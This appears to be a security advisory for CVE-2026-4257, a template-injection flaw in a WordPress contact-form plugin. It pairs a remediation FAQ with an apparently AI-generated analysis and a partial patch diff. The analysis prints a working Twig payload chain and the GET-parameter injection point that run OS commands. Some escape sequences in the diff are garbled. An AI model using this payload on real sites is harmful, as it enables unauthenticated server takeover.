What is CVE-2026-4257?

CVE-2026-4257 is a critical vulnerability in the Contact Form by Supsystic plugin for WordPress, allowing unauthenticated Server-Side Template Injection (SSTI) that can lead to Remote Code Execution (RCE). This occurs due to improper handling of user input in the prefill functionality, enabling attackers to inject malicious Twig expressions.

How does the vulnerability work?

The vulnerability exploits the `cfsPreFill` function, which processes GET parameters without proper sanitization. Attackers can append Twig expressions to form field values via GET requests, allowing them to execute arbitrary PHP functions and OS commands on the server.

Who is affected by this vulnerability?

Any WordPress site using the Contact Form by Supsystic plugin version 1.7.36 or earlier is affected by this vulnerability. Administrators should check their plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the WordPress admin dashboard, go to the ‘Plugins’ section, and look for the Contact Form by Supsystic plugin. If the version is 1.7.36 or lower, your site is vulnerable.

How can I fix this vulnerability?

The vulnerability is patched in version 1.8.0 of the Contact Form by Supsystic plugin. To fix the issue, update the plugin to the latest version via the WordPress admin dashboard or download it from the official repository.

What if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin until it can be updated. Additionally, implement web application firewalls or security plugins that can help block malicious requests targeting this vulnerability.

What does a CVSS score of 9.8 indicate?

A CVSS score of 9.8 indicates a critical vulnerability, meaning that it poses a significant risk to the security of affected systems. Exploitation can lead to complete server compromise, allowing attackers to execute arbitrary code.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to remote code execution, allowing attackers to read, modify, or delete files on the server, access databases, and potentially gain control over the entire server environment.

How does the proof of concept demonstrate the issue?

The proof of concept outlines how an attacker can exploit the vulnerability by crafting a URL with GET parameters that include malicious Twig expressions. This demonstrates the ease of executing OS commands without authentication, highlighting the severity of the issue.

What should I do if I suspect my site has been compromised?

If you suspect that your site has been compromised due to this vulnerability, immediately take the site offline, investigate the breach, and restore from a clean backup. Review logs for unauthorized access and consider consulting with a security professional.

Are there any other security measures I should take?

In addition to updating vulnerable plugins, regularly review and update all WordPress components, utilize strong passwords, implement two-factor authentication, and conduct regular security audits to enhance your site’s overall security posture.

How can I stay informed about future vulnerabilities?

To stay informed about future vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the Common Vulnerabilities and Exposures (CVE) database for updates relevant to your installed plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 1, 2026

CVE-2026-4257: Contact Form by Supsystic <= 1.7.36 – Unauthenticated Server-Side Template Injection via Prefill Functionality (contact-form-by-supsystic)

CVE ID CVE-2026-4257

Plugin contact-form-by-supsystic

Severity Critical (CVSS 9.8)

CWE 94

Vulnerable Version 1.7.36

Patched Version 1.8.0

Disclosed March 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4257:
This vulnerability is an unauthenticated Server-Side Template Injection (SSTI) leading to Remote Code Execution (RCE) in the Contact Form by Supsystic WordPress plugin versions <= 1.7.36. The plugin's prefill functionality allows attackers to inject arbitrary Twig expressions into form field values via GET parameters. The Twig template engine lacks sandboxing, enabling execution of arbitrary PHP functions and OS commands on the server. This critical vulnerability has a CVSS score of 9.8.

Atomic Edge research identifies the root cause in two components. The `cfsPreFill` function in `/classes/field.php` processes GET parameters to prefill form fields without proper sanitization. This function passes user-controlled input directly to the Twig template engine. The plugin uses the deprecated `Twig_Loader_String` class, which loads templates from strings rather than files. This combination allows unauthenticated users to inject Twig expressions that the engine evaluates. The vulnerability manifests because the Twig environment lacks a sandbox mode and does not restrict dangerous functions.

Exploitation occurs via HTTP GET requests to any page containing a vulnerable contact form. Attackers append GET parameters with field names prefixed by `cfs_`. For example, `?cfs_field_name={{malicious_twig}}`. The payload leverages Twig's `registerUndefinedFilterCallback()` method to register arbitrary PHP callbacks. A typical exploit chain uses `{{_self.env.registerUndefinedFilterCallback("system")}}` followed by `{{_self.env.getFilter("id")}}` to execute OS commands. Atomic Edge analysis confirms that no authentication is required, and the attack works from the frontend.

The patch in version 1.8.0 addresses the vulnerability by implementing input validation and escaping. The `cfsPreFill` function now applies `esc_attr()` to all prefilled values before passing them to the template engine. This HTML escaping neutralizes Twig expression delimiters like `{{` and `}}`. The diff shows changes in `/classes/field.php` where `$value = esc_attr($value);` is added within the prefill logic. The patch also updates the Twig library files to a newer version, but the primary fix is the escaping of user input before template rendering.

Successful exploitation grants attackers remote code execution with the web server's privileges. This typically means the ability to execute arbitrary PHP code and system commands. Attackers can read, modify, or delete files on the server, create backdoors, access databases, and pivot to internal networks. The vulnerability affects all WordPress sites running the vulnerable plugin version, requiring no user interaction or authentication. Atomic Edge assesses the impact as complete server compromise.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/contact-form-by-supsystic/cfs.php
+++ b/contact-form-by-supsystic/cfs.php
@@ -1,8 +1,9 @@
 <?php
+
 /**
  * Plugin Name: Contact Form by Supsystic
  * Description: Contact Form Builder with drag-and-drop editor to create responsive, mobile ready contact forms in a second. Custom fields and contact form templates
- * Version: 1.7.36
+ * Version: 1.8.0
  * Author: supsystic.com
  * Author URI: https://supsystic.com
  * Text Domain: contact-form-by-supsystic
@@ -11,41 +12,41 @@
 /**
  * Base config constants and functions
  */
-require_once dirname(__FILE__) . DIRECTORY_SEPARATOR . "config.php";
-require_once dirname(__FILE__) . DIRECTORY_SEPARATOR . "functions.php";
+require_once dirname(__FILE__) . DIRECTORY_SEPARATOR . 'config.php';
+require_once dirname(__FILE__) . DIRECTORY_SEPARATOR . 'functions.php';
 /**
  * Connect all required core classes
  */
 importSqlParser();
-importClassCfs("dbCfs");
-importClassCfs("installerCfs");
-importClassCfs("baseObjectCfs");
-importClassCfs("moduleCfs");
-importClassCfs("moduleWidgetCfs");
-importClassCfs("modelCfs");
-importClassCfs("modelSubscribeCfs");
-importClassCfs("viewCfs");
-importClassCfs("controllerCfs");
-importClassCfs("helperCfs");
-importClassCfs("dispatcherCfs");
-importClassCfs("fieldCfs");
-importClassCfs("tableCfs");
-importClassCfs("frameCfs");
+importClassCfs('dbCfs');
+importClassCfs('installerCfs');
+importClassCfs('baseObjectCfs');
+importClassCfs('moduleCfs');
+importClassCfs('moduleWidgetCfs');
+importClassCfs('modelCfs');
+importClassCfs('modelSubscribeCfs');
+importClassCfs('viewCfs');
+importClassCfs('controllerCfs');
+importClassCfs('helperCfs');
+importClassCfs('dispatcherCfs');
+importClassCfs('fieldCfs');
+importClassCfs('tableCfs');
+importClassCfs('frameCfs');
 /**
  * @deprecated since version 1.0.1
  */
-importClassCfs("langCfs");
-importClassCfs("reqCfs");
-importClassCfs("uriCfs");
-importClassCfs("htmlCfs");
-importClassCfs("responseCfs");
-importClassCfs("fieldAdapterCfs");
-importClassCfs("validatorCfs");
-importClassCfs("errorsCfs");
-importClassCfs("utilsCfs");
-importClassCfs("modInstallerCfs");
-importClassCfs("installerDbUpdaterCfs");
-importClassCfs("dateCfs");
+importClassCfs('langCfs');
+importClassCfs('reqCfs');
+importClassCfs('uriCfs');
+importClassCfs('htmlCfs');
+importClassCfs('responseCfs');
+importClassCfs('fieldAdapterCfs');
+importClassCfs('validatorCfs');
+importClassCfs('errorsCfs');
+importClassCfs('utilsCfs');
+importClassCfs('modInstallerCfs');
+importClassCfs('installerDbUpdaterCfs');
+importClassCfs('dateCfs');
 /**
  * Check plugin version - maybe we need to update database, and check global errors in request
  */
--- a/contact-form-by-supsystic/classes/Twig/Autoloader.php
+++ b/contact-form-by-supsystic/classes/Twig/Autoloader.php
@@ -16,33 +16,33 @@
  */
 class Twig_Autoloader
 {
-    /**
-     * Registers Twig_Autoloader as an SPL autoloader.
-     *
-     * @param bool    $prepend Whether to prepend the autoloader or not.
-     */
-    public static function register($prepend = false)
-    {
-        if (version_compare(phpversion(), '5.3.0', '>=')) {
-            spl_autoload_register(array(__CLASS__, 'autoload'), true, $prepend);
-        } else {
-            spl_autoload_register(array(__CLASS__, 'autoload'));
-        }
+  /**
+   * Registers Twig_Autoloader as an SPL autoloader.
+   *
+   * @param bool    $prepend Whether to prepend the autoloader or not.
+   */
+  public static function register($prepend = false)
+  {
+    if (version_compare(phpversion(), '5.3.0', '>=')) {
+      spl_autoload_register([__CLASS__, 'autoload'], true, $prepend);
+    } else {
+      spl_autoload_register([__CLASS__, 'autoload']);
     }
+  }

-    /**
-     * Handles autoloading of classes.
-     *
-     * @param string $class A class name.
-     */
-    public static function autoload($class)
-    {
-        if (0 !== strpos($class, 'Twig')) {
-            return;
-        }
+  /**
+   * Handles autoloading of classes.
+   *
+   * @param string $class A class name.
+   */
+  public static function autoload($class)
+  {
+    if (0 !== strpos($class, 'Twig')) {
+      return;
+    }

-        if (is_file($file = dirname(__FILE__).'/../'.str_replace(array('_', ""), array('/', ''), $class).'.php')) {
-            require $file;
-        }
+    if (is_file($file = dirname(__FILE__) . '/../' . str_replace(['_', ""], ['/', ''], $class) . '.php')) {
+      require $file;
     }
+  }
 }
--- a/contact-form-by-supsystic/classes/Twig/Compiler.php
+++ b/contact-form-by-supsystic/classes/Twig/Compiler.php
@@ -17,254 +17,254 @@
  */
 class Twig_Compiler implements Twig_CompilerInterface
 {
-    protected $lastLine;
-    protected $source;
-    protected $indentation;
-    protected $env;
-    protected $debugInfo;
-    protected $sourceOffset;
-    protected $sourceLine;
-    protected $filename;
-
-    /**
-     * Constructor.
-     *
-     * @param Twig_Environment $env The twig environment instance
-     */
-    public function __construct(Twig_Environment $env)
-    {
-        $this->env = $env;
-        $this->debugInfo = array();
-    }
-
-    public function getFilename()
-    {
-        return $this->filename;
-    }
-
-    /**
-     * Returns the environment instance related to this compiler.
-     *
-     * @return Twig_Environment The environment instance
-     */
-    public function getEnvironment()
-    {
-        return $this->env;
-    }
-
-    /**
-     * Gets the current PHP code after compilation.
-     *
-     * @return string The PHP code
-     */
-    public function getSource()
-    {
-        return $this->source;
-    }
-
-    /**
-     * Compiles a node.
-     *
-     * @param Twig_NodeInterface $node        The node to compile
-     * @param int                $indentation The current indentation
-     *
-     * @return Twig_Compiler The current compiler instance
-     */
-    public function compile(Twig_NodeInterface $node, $indentation = 0)
-    {
-        $this->lastLine = null;
-        $this->source = '';
-        $this->sourceOffset = 0;
-        // source code starts at 1 (as we then increment it when we encounter new lines)
-        $this->sourceLine = 1;
-        $this->indentation = $indentation;
-
-        if ($node instanceof Twig_Node_Module) {
-            $this->filename = $node->getAttribute('filename');
-        }
-
-        $node->compile($this);
-
-        return $this;
+  protected $lastLine;
+  protected $source;
+  protected $indentation;
+  protected $env;
+  protected $debugInfo;
+  protected $sourceOffset;
+  protected $sourceLine;
+  protected $filename;
+
+  /**
+   * Constructor.
+   *
+   * @param Twig_Environment $env The twig environment instance
+   */
+  public function __construct(Twig_Environment $env)
+  {
+    $this->env = $env;
+    $this->debugInfo = [];
+  }
+
+  public function getFilename()
+  {
+    return $this->filename;
+  }
+
+  /**
+   * Returns the environment instance related to this compiler.
+   *
+   * @return Twig_Environment The environment instance
+   */
+  public function getEnvironment()
+  {
+    return $this->env;
+  }
+
+  /**
+   * Gets the current PHP code after compilation.
+   *
+   * @return string The PHP code
+   */
+  public function getSource()
+  {
+    return $this->source;
+  }
+
+  /**
+   * Compiles a node.
+   *
+   * @param Twig_NodeInterface $node        The node to compile
+   * @param int                $indentation The current indentation
+   *
+   * @return Twig_Compiler The current compiler instance
+   */
+  public function compile(Twig_NodeInterface $node, $indentation = 0)
+  {
+    $this->lastLine = null;
+    $this->source = '';
+    $this->sourceOffset = 0;
+    // source code starts at 1 (as we then increment it when we encounter new lines)
+    $this->sourceLine = 1;
+    $this->indentation = $indentation;
+
+    if ($node instanceof Twig_Node_Module) {
+      $this->filename = $node->getAttribute('filename');
+    }
+
+    $node->compile($this);
+
+    return $this;
+  }
+
+  public function subcompile(Twig_NodeInterface $node, $raw = true)
+  {
+    if (false === $raw) {
+      $this->addIndentation();
+    }
+
+    $node->compile($this);
+
+    return $this;
+  }
+
+  /**
+   * Adds a raw string to the compiled code.
+   *
+   * @param string $string The string
+   *
+   * @return Twig_Compiler The current compiler instance
+   */
+  public function raw($string)
+  {
+    $this->source .= $string;
+
+    return $this;
+  }
+
+  /**
+   * Writes a string to the compiled code by adding indentation.
+   *
+   * @return Twig_Compiler The current compiler instance
+   */
+  public function write()
+  {
+    $strings = func_get_args();
+    foreach ($strings as $string) {
+      $this->addIndentation();
+      $this->source .= $string;
+    }
+
+    return $this;
+  }
+
+  /**
+   * Appends an indentation to the current PHP code after compilation.
+   *
+   * @return Twig_Compiler The current compiler instance
+   */
+  public function addIndentation()
+  {
+    $this->source .= str_repeat(' ', $this->indentation * 4);
+
+    return $this;
+  }
+
+  /**
+   * Adds a quoted string to the compiled code.
+   *
+   * @param string $value The string
+   *
+   * @return Twig_Compiler The current compiler instance
+   */
+  public function string($value)
+  {
+    $this->source .= sprintf('"%s"', addcslashes($value, "t"$\"));
+
+    return $this;
+  }
+
+  /**
+   * Returns a PHP representation of a given value.
+   *
+   * @param mixed $value The value to convert
+   *
+   * @return Twig_Compiler The current compiler instance
+   */
+  public function repr($value)
+  {
+    if (is_int($value) || is_float($value)) {
+      if (false !== ($locale = setlocale(LC_NUMERIC, 0))) {
+        setlocale(LC_NUMERIC, 'C');
+      }
+
+      $this->raw($value);
+
+      if (false !== $locale) {
+        setlocale(LC_NUMERIC, $locale);
+      }
+    } elseif (null === $value) {
+      $this->raw('null');
+    } elseif (is_bool($value)) {
+      $this->raw($value ? 'true' : 'false');
+    } elseif (is_array($value)) {
+      $this->raw('array(');
+      $first = true;
+      foreach ($value as $key => $value) {
+        if (!$first) {
+          $this->raw(', ');
+        }
+        $first = false;
+        $this->repr($key);
+        $this->raw(' => ');
+        $this->repr($value);
+      }
+      $this->raw(')');
+    } else {
+      $this->string($value);
+    }
+
+    return $this;
+  }
+
+  /**
+   * Adds debugging information.
+   *
+   * @param Twig_NodeInterface $node The related twig node
+   *
+   * @return Twig_Compiler The current compiler instance
+   */
+  public function addDebugInfo(Twig_NodeInterface $node)
+  {
+    if ($node->getLine() != $this->lastLine) {
+      $this->write(sprintf("// line %dn", $node->getLine()));
+
+      // when mbstring.func_overload is set to 2
+      // mb_substr_count() replaces substr_count()
+      // but they have different signatures!
+      if (((int) ini_get('mbstring.func_overload')) & 2) {
+        // this is much slower than the "right" version
+        $this->sourceLine += mb_substr_count(mb_substr($this->source, $this->sourceOffset), "n");
+      } else {
+        $this->sourceLine += substr_count($this->source, "n", $this->sourceOffset);
+      }
+      $this->sourceOffset = strlen($this->source);
+      $this->debugInfo[$this->sourceLine] = $node->getLine();
+
+      $this->lastLine = $node->getLine();
+    }
+
+    return $this;
+  }
+
+  public function getDebugInfo()
+  {
+    return $this->debugInfo;
+  }
+
+  /**
+   * Indents the generated code.
+   *
+   * @param int     $step The number of indentation to add
+   *
+   * @return Twig_Compiler The current compiler instance
+   */
+  public function indent($step = 1)
+  {
+    $this->indentation += $step;
+
+    return $this;
+  }
+
+  /**
+   * Outdents the generated code.
+   *
+   * @param int     $step The number of indentation to remove
+   *
+   * @return Twig_Compiler The current compiler instance
+   *
+   * @throws LogicException When trying to outdent too much so the indentation would become negative
+   */
+  public function outdent($step = 1)
+  {
+    // can't outdent by more steps than the current indentation level
+    if ($this->indentation < $step) {
+      throw new LogicException('Unable to call outdent() as the indentation would become negative');
     }

-    public function subcompile(Twig_NodeInterface $node, $raw = true)
-    {
-        if (false === $raw) {
-            $this->addIndentation();
-        }
-
-        $node->compile($this);
+    $this->indentation -= $step;

-        return $this;
-    }
-
-    /**
-     * Adds a raw string to the compiled code.
-     *
-     * @param string $string The string
-     *
-     * @return Twig_Compiler The current compiler instance
-     */
-    public function raw($string)
-    {
-        $this->source .= $string;
-
-        return $this;
-    }
-
-    /**
-     * Writes a string to the compiled code by adding indentation.
-     *
-     * @return Twig_Compiler The current compiler instance
-     */
-    public function write()
-    {
-        $strings = func_get_args();
-        foreach ($strings as $string) {
-            $this->addIndentation();
-            $this->source .= $string;
-        }
-
-        return $this;
-    }
-
-    /**
-     * Appends an indentation to the current PHP code after compilation.
-     *
-     * @return Twig_Compiler The current compiler instance
-     */
-    public function addIndentation()
-    {
-        $this->source .= str_repeat(' ', $this->indentation * 4);
-
-        return $this;
-    }
-
-    /**
-     * Adds a quoted string to the compiled code.
-     *
-     * @param string $value The string
-     *
-     * @return Twig_Compiler The current compiler instance
-     */
-    public function string($value)
-    {
-        $this->source .= sprintf('"%s"', addcslashes($value, "t"$\"));
-
-        return $this;
-    }
-
-    /**
-     * Returns a PHP representation of a given value.
-     *
-     * @param mixed $value The value to convert
-     *
-     * @return Twig_Compiler The current compiler instance
-     */
-    public function repr($value)
-    {
-        if (is_int($value) || is_float($value)) {
-            if (false !== $locale = setlocale(LC_NUMERIC, 0)) {
-                setlocale(LC_NUMERIC, 'C');
-            }
-
-            $this->raw($value);
-
-            if (false !== $locale) {
-                setlocale(LC_NUMERIC, $locale);
-            }
-        } elseif (null === $value) {
-            $this->raw('null');
-        } elseif (is_bool($value)) {
-            $this->raw($value ? 'true' : 'false');
-        } elseif (is_array($value)) {
-            $this->raw('array(');
-            $first = true;
-            foreach ($value as $key => $value) {
-                if (!$first) {
-                    $this->raw(', ');
-                }
-                $first = false;
-                $this->repr($key);
-                $this->raw(' => ');
-                $this->repr($value);
-            }
-            $this->raw(')');
-        } else {
-            $this->string($value);
-        }
-
-        return $this;
-    }
-
-    /**
-     * Adds debugging information.
-     *
-     * @param Twig_NodeInterface $node The related twig node
-     *
-     * @return Twig_Compiler The current compiler instance
-     */
-    public function addDebugInfo(Twig_NodeInterface $node)
-    {
-        if ($node->getLine() != $this->lastLine) {
-            $this->write(sprintf("// line %dn", $node->getLine()));
-
-            // when mbstring.func_overload is set to 2
-            // mb_substr_count() replaces substr_count()
-            // but they have different signatures!
-            if (((int) ini_get('mbstring.func_overload')) & 2) {
-                // this is much slower than the "right" version
-                $this->sourceLine += mb_substr_count(mb_substr($this->source, $this->sourceOffset), "n");
-            } else {
-                $this->sourceLine += substr_count($this->source, "n", $this->sourceOffset);
-            }
-            $this->sourceOffset = strlen($this->source);
-            $this->debugInfo[$this->sourceLine] = $node->getLine();
-
-            $this->lastLine = $node->getLine();
-        }
-
-        return $this;
-    }
-
-    public function getDebugInfo()
-    {
-        return $this->debugInfo;
-    }
-
-    /**
-     * Indents the generated code.
-     *
-     * @param int     $step The number of indentation to add
-     *
-     * @return Twig_Compiler The current compiler instance
-     */
-    public function indent($step = 1)
-    {
-        $this->indentation += $step;
-
-        return $this;
-    }
-
-    /**
-     * Outdents the generated code.
-     *
-     * @param int     $step The number of indentation to remove
-     *
-     * @return Twig_Compiler The current compiler instance
-     *
-     * @throws LogicException When trying to outdent too much so the indentation would become negative
-     */
-    public function outdent($step = 1)
-    {
-        // can't outdent by more steps than the current indentation level
-        if ($this->indentation < $step) {
-            throw new LogicException('Unable to call outdent() as the indentation would become negative');
-        }
-
-        $this->indentation -= $step;
-
-        return $this;
-    }
+    return $this;
+  }
 }
--- a/contact-form-by-supsystic/classes/Twig/CompilerInterface.php
+++ b/contact-form-by-supsystic/classes/Twig/CompilerInterface.php
@@ -18,19 +18,19 @@
  */
 interface Twig_CompilerInterface
 {
-    /**
-     * Compiles a node.
-     *
-     * @param Twig_NodeInterface $node The node to compile
-     *
-     * @return Twig_CompilerInterface The current compiler instance
-     */
-    public function compile(Twig_NodeInterface $node);
+  /**
+   * Compiles a node.
+   *
+   * @param Twig_NodeInterface $node The node to compile
+   *
+   * @return Twig_CompilerInterface The current compiler instance
+   */
+  public function compile(Twig_NodeInterface $node);

-    /**
-     * Gets the current PHP code after compilation.
-     *
-     * @return string The PHP code
-     */
-    public function getSource();
+  /**
+   * Gets the current PHP code after compilation.
+   *
+   * @return string The PHP code
+   */
+  public function getSource();
 }
--- a/contact-form-by-supsystic/classes/Twig/Environment.php
+++ b/contact-form-by-supsystic/classes/Twig/Environment.php
@@ -16,1239 +16,1242 @@
  */
 class Twig_Environment
 {
-    const VERSION = '1.16.0';
-
-    protected $charset;
-    protected $loader;
-    protected $debug;
-    protected $autoReload;
-    protected $cache;
-    protected $lexer;
-    protected $parser;
-    protected $compiler;
-    protected $baseTemplateClass;
-    protected $extensions;
-    protected $parsers;
-    protected $visitors;
-    protected $filters;
-    protected $tests;
-    protected $functions;
-    protected $globals;
-    protected $runtimeInitialized;
-    protected $extensionInitialized;
-    protected $loadedTemplates;
-    protected $strictVariables;
-    protected $unaryOperators;
-    protected $binaryOperators;
-    protected $templateClassPrefix = '__TwigTemplate_';
-    protected $functionCallbacks;
-    protected $filterCallbacks;
-    protected $staging;
-
-    /**
-     * Constructor.
-     *
-     * Available options:
-     *
-     *  * debug: When set to true, it automatically set "auto_reload" to true as
-     *           well (default to false).
-     *
-     *  * charset: The charset used by the templates (default to UTF-8).
-     *
-     *  * base_template_class: The base template class to use for generated
-     *                         templates (default to Twig_Template).
-     *
-     *  * cache: An absolute path where to store the compiled templates, or
-     *           false to disable compilation cache (default).
-     *
-     *  * auto_reload: Whether to reload the template if the original source changed.
-     *                 If you don't provide the auto_reload option, it will be
-     *                 determined automatically based on the debug value.
-     *
-     *  * strict_variables: Whether to ignore invalid variables in templates
-     *                      (default to false).
-     *
-     *  * autoescape: Whether to enable auto-escaping (default to html):
-     *                  * false: disable auto-escaping
-     *                  * true: equivalent to html
-     *                  * html, js: set the autoescaping to one of the supported strategies
-     *                  * PHP callback: a PHP callback that returns an escaping strategy based on the template "filename"
-     *
-     *  * optimizations: A flag that indicates which optimizations to apply
-     *                   (default to -1 which means that all optimizations are enabled;
-     *                   set it to 0 to disable).
-     *
-     * @param Twig_LoaderInterface $loader  A Twig_LoaderInterface instance
-     * @param array                $options An array of options
-     */
-    public function __construct(Twig_LoaderInterface $loader = null, $options = array())
-    {
-        if (null !== $loader) {
-            $this->setLoader($loader);
-        }
-
-        $options = array_merge(array(
-            'debug'               => false,
-            'charset'             => 'UTF-8',
-            'base_template_class' => 'Twig_Template',
-            'strict_variables'    => false,
-            'autoescape'          => 'html',
-            'cache'               => false,
-            'auto_reload'         => null,
-            'optimizations'       => -1,
-        ), $options);
-
-        $this->debug              = (bool) $options['debug'];
-        $this->charset            = strtoupper($options['charset']);
-        $this->baseTemplateClass  = $options['base_template_class'];
-        $this->autoReload         = null === $options['auto_reload'] ? $this->debug : (bool) $options['auto_reload'];
-        $this->strictVariables    = (bool) $options['strict_variables'];
-        $this->runtimeInitialized = false;
-        $this->setCache($options['cache']);
-        $this->functionCallbacks = array();
-        $this->filterCallbacks = array();
-
-        $this->addExtension(new Twig_Extension_Core());
-        $this->addExtension(new Twig_Extension_Escaper($options['autoescape']));
-        $this->addExtension(new Twig_Extension_Optimizer($options['optimizations']));
-        $this->extensionInitialized = false;
-        $this->staging = new Twig_Extension_Staging();
-    }
-
-    /**
-     * Gets the base template class for compiled templates.
-     *
-     * @return string The base template class name
-     */
-    public function getBaseTemplateClass()
-    {
-        return $this->baseTemplateClass;
-    }
-
-    /**
-     * Sets the base template class for compiled templates.
-     *
-     * @param string $class The base template class name
-     */
-    public function setBaseTemplateClass($class)
-    {
-        $this->baseTemplateClass = $class;
-    }
-
-    /**
-     * Enables debugging mode.
-     */
-    public function enableDebug()
-    {
-        $this->debug = true;
-    }
-
-    /**
-     * Disables debugging mode.
-     */
-    public function disableDebug()
-    {
-        $this->debug = false;
-    }
-
-    /**
-     * Checks if debug mode is enabled.
-     *
-     * @return bool    true if debug mode is enabled, false otherwise
-     */
-    public function isDebug()
-    {
-        return $this->debug;
-    }
-
-    /**
-     * Enables the auto_reload option.
-     */
-    public function enableAutoReload()
-    {
-        $this->autoReload = true;
-    }
-
-    /**
-     * Disables the auto_reload option.
-     */
-    public function disableAutoReload()
-    {
-        $this->autoReload = false;
-    }
-
-    /**
-     * Checks if the auto_reload option is enabled.
-     *
-     * @return bool    true if auto_reload is enabled, false otherwise
-     */
-    public function isAutoReload()
-    {
-        return $this->autoReload;
-    }
-
-    /**
-     * Enables the strict_variables option.
-     */
-    public function enableStrictVariables()
-    {
-        $this->strictVariables = true;
-    }
-
-    /**
-     * Disables the strict_variables option.
-     */
-    public function disableStrictVariables()
-    {
-        $this->strictVariables = false;
-    }
-
-    /**
-     * Checks if the strict_variables option is enabled.
-     *
-     * @return bool    true if strict_variables is enabled, false otherwise
-     */
-    public function isStrictVariables()
-    {
-        return $this->strictVariables;
-    }
-
-    /**
-     * Gets the cache directory or false if cache is disabled.
-     *
-     * @return string|false
-     */
-    public function getCache()
-    {
-        return $this->cache;
-    }
-
-     /**
-      * Sets the cache directory or false if cache is disabled.
-      *
-      * @param string|false $cache The absolute path to the compiled templates,
-      *                            or false to disable cache
-      */
-    public function setCache($cache)
-    {
-        $this->cache = $cache ? $cache : false;
-    }
-
-    /**
-     * Gets the cache filename for a given template.
-     *
-     * @param string $name The template name
-     *
-     * @return string|false The cache file name or false when caching is disabled
-     */
-    public function getCacheFilename($name)
-    {
-        if (false === $this->cache) {
-            return false;
-        }
-
-        $class = substr($this->getTemplateClass($name), strlen($this->templateClassPrefix));
-
-        return $this->getCache().'/'.substr($class, 0, 2).'/'.substr($class, 2, 2).'/'.substr($class, 4).'.php';
-    }
-
-    /**
-     * Gets the template class associated with the given string.
-     *
-     * @param string  $name  The name for which to calculate the template class name
-     * @param int     $index The index if it is an embedded template
-     *
-     * @return string The template class name
-     */
-    public function getTemplateClass($name, $index = null)
-    {
-        return $this->templateClassPrefix.hash('sha256', $this->getLoader()->getCacheKey($name)).(null === $index ? '' : '_'.$index);
-    }
-
-    /**
-     * Gets the template class prefix.
-     *
-     * @return string The template class prefix
-     */
-    public function getTemplateClassPrefix()
-    {
-        return $this->templateClassPrefix;
-    }
-
-    /**
-     * Renders a template.
-     *
-     * @param string $name    The template name
-     * @param array  $context An array of parameters to pass to the template
-     *
-     * @return string The rendered template
-     *
-     * @throws Twig_Error_Loader  When the template cannot be found
-     * @throws Twig_Error_Syntax  When an error occurred during compilation
-     * @throws Twig_Error_Runtime When an error occurred during rendering
-     */
-    public function render($name, array $context = array())
-    {
-        return $this->loadTemplate($name)->render($context);
-    }
-
-    /**
-     * Displays a template.
-     *
-     * @param string $name    The template name
-     * @param array  $context An array of parameters to pass to the template
-     *
-     * @throws Twig_Error_Loader  When the template cannot be found
-     * @throws Twig_Error_Syntax  When an error occurred during compilation
-     * @throws Twig_Error_Runtime When an error occurred during rendering
-     */
-    public function display($name, array $context = array())
-    {
-        $this->loadTemplate($name)->display($context);
-    }
-
-    /**
-     * Loads a template by name.
-     *
-     * @param string  $name  The template name
-     * @param int     $index The index if it is an embedded template
-     *
-     * @return Twig_TemplateInterface A template instance representing the given template name
-     *
-     * @throws Twig_Error_Loader When the template cannot be found
-     * @throws Twig_Error_Syntax When an error occurred during compilation
-     */
-    public function loadTemplate($name, $index = null)
-    {
-        $cls = $this->getTemplateClass($name, $index);
-
-        if (isset($this->loadedTemplates[$cls])) {
-            return $this->loadedTemplates[$cls];
-        }
-
-        if (!class_exists($cls, false)) {
-            if (false === $cache = $this->getCacheFilename($name)) {
-                eval('?>'.$this->compileSource($this->getLoader()->getSource($name), $name));
-            } else {
-                if (!is_file($cache) || ($this->isAutoReload() && !$this->isTemplateFresh($name, filemtime($cache)))) {
-                    $this->writeCacheFile($cache, $this->compileSource($this->getLoader()->getSource($name), $name));
-                }
-
-                require_once $cache;
-            }
-        }
-
-        if (!$this->runtimeInitialized) {
-            $this->initRuntime();
-        }
-
-        return $this->loadedTemplates[$cls] = new $cls($this);
-    }
-
-    /**
-     * Returns true if the template is still fresh.
-     *
-     * Besides checking the loader for freshness information,
-     * this method also checks if the enabled extensions have
-     * not changed.
-     *
-     * @param string    $name The template name
-     * @param timestamp $time The last modification time of the cached template
-     *
-     * @return bool    true if the template is fresh, false otherwise
-     */
-    public function isTemplateFresh($name, $time)
-    {
-        foreach ($this->extensions as $extension) {
-            $r = new ReflectionObject($extension);
-            if (filemtime($r->getFileName()) > $time) {
-                return false;
-            }
-        }
-
-        return $this->getLoader()->isFresh($name, $time);
-    }
-
-    /**
-     * Tries to load a template consecutively from an array.
-     *
-     * Similar to loadTemplate() but it also accepts Twig_TemplateInterface instances and an array
-     * of templates where each is tried to be loaded.
-     *
-     * @param string|Twig_Template|array $names A template or an array of templates to try consecutively
-     *
-     * @return Twig_Template
-     *
-     * @throws Twig_Error_Loader When none of the templates can be found
-     * @throws Twig_Error_Syntax When an error occurred during compilation
-     */
-    public function resolveTemplate($names)
-    {
-        if (!is_array($names)) {
-            $names = array($names);
-        }
-
-        foreach ($names as $name) {
-            if ($name instanceof Twig_Template) {
-                return $name;
-            }
-
-            try {
-                return $this->loadTemplate($name);
-            } catch (Twig_Error_Loader $e) {
-            }
-        }
-
-        if (1 === count($names)) {
-            throw $e;
-        }
-
-        throw new Twig_Error_Loader(sprintf('Unable to find one of the following templates: "%s".', implode('", "', $names)));
-    }
-
-    /**
-     * Clears the internal template cache.
-     */
-    public function clearTemplateCache()
-    {
-        $this->loadedTemplates = array();
-    }
-
-    /**
-     * Clears the template cache files on the filesystem.
-     */
-    public function clearCacheFiles()
-    {
-        if (false === $this->cache) {
-            return;
-        }
-
-        foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($this->cache), RecursiveIteratorIterator::LEAVES_ONLY) as $file) {
-            if ($file->isFile()) {
-                @unlink($file->getPathname());
-            }
-        }
-    }
-
-    /**
-     * Gets the Lexer instance.
-     *
-     * @return Twig_LexerInterface A Twig_LexerInterface instance
-     */
-    public function getLexer()
-    {
-        if (null === $this->lexer) {
-            $this->lexer = new Twig_Lexer($this);
-        }
-
-        return $this->lexer;
-    }
-
-    /**
-     * Sets the Lexer instance.
-     *
-     * @param Twig_LexerInterface A Twig_LexerInterface instance
-     */
